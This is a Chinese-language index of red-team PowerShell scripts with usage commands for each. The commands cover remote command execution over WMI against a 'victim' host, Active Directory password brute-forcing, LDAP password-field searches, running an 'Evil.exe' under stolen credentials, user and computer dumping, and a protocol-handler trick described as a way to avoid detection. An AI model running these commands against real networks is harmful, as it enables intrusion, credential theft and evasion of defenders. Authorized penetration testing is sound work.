Red Team 常用 Powershell 腳本

各種常用PowerShell腳本：

Search-EventForUser.ps1：在 Windows 事件日志中搜索特定用戶的 Powershell 腳本
Search-FullNameToSamAccount.ps1：SamAccountName 的全名
Search-UserPassword.ps1：在 LDAP 中搜索 userPassword 字段
Remote-WmiExecute.ps1：使用 WMI 遠程執行命令
Take-Screenshot.ps1：截圖（PNG）
Get-BrowserHomepage.ps1：獲取瀏覽器主頁
Get-IEBookmarks.ps1：列出所有 Internet Explorer 書簽 URL
Invoke-ADPasswordBruteForce.ps1：測試用戶密碼
Utility.ps1：包含幾個 cmdlet
Run-As.ps1：以另一個用戶身份運行進程（憑據）
Get-ProcessList.ps1：列出進程、所有者和命令行參數
Remote-RegisterProtocolHandler.ps1：使用協議處理程序運行您的命令以繞過某些檢測
Add-UserLogonScript：為特定用戶添加登錄腳本

Search-EventForUser.ps1 用法

module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
module-import .\Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
module-import .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
module-import .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password "123456"

Search-FulNameToSamAccount.ps1 用法

module-import .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
module-import .\Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount

Search-UserPassword.ps1 用法

module-import .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
module-import .\Search-UserPassword.ps1; "god", "mom" | Search-UserPassword

Remote-WmiExecute.ps1 用法

module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"

Take-Screenshot.ps1 用法

module-import .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png

Get-BrowserHomepage.ps1 用法

module-import .\Get-BrowserHomepage.ps1; Get-BrowserHomepage

Get-IEBookmarks.ps1 用法 

module-import .\Get-IEBookmarks.ps1; Get-IEBookmarks

Invoke-ADPasswordBruteForce.ps1 用法

module-import .\Invoke-ADPasswordBruteForce; Invoke-ADPasswordBruteForce -Username "mr.un1k0d3r" -Password "password"
module-import .\Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password"
module-import .\Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX

Utility.ps1用法

Search-EventForUser
Search-EventForUserByDomain
Search-EventForUserByIP
Search-FullNameToSamAccount
Ldap-GetProperty
Search-UserPassword
Dump-UserEmail
Dump-Computers
Dump-UserName

Run-As.ps1 用法

module-import .\Run-As.ps1; Run-As -Username RingZer0\Mr.Un1k0d3r -Password "IShouldNotLeakThisPasswordOnTheInternet" -Process "C:\Evil.exe"

COM-Utility.ps1用法

Invoke-COM-ScheduleService
Invoke-COM-XMLHTTP
Invoke-COM-ShellBrowserWindow
Invoke-COM-WindowsScriptHost
Invoke-COM-ProcessChain 
Invoke-COM-ShellApplication

Get-ProcessList.ps1 用法

module-import .\Get-ProcessList.ps1; Get-ProcessList

Remote-RegisterProtocolHandler.ps1 用法

此 cmdlet 創建將調用您的有效負載的協議處理程序。這個想法是為了避免檢測，因為將執行的命令如下所示：explorer ms-browse://

您注冊的自定義處理程序在哪里 ms-browser 并將執行您的命令

module-import .\Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run"
module-import .\Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name

注：如有侵權請聯系刪除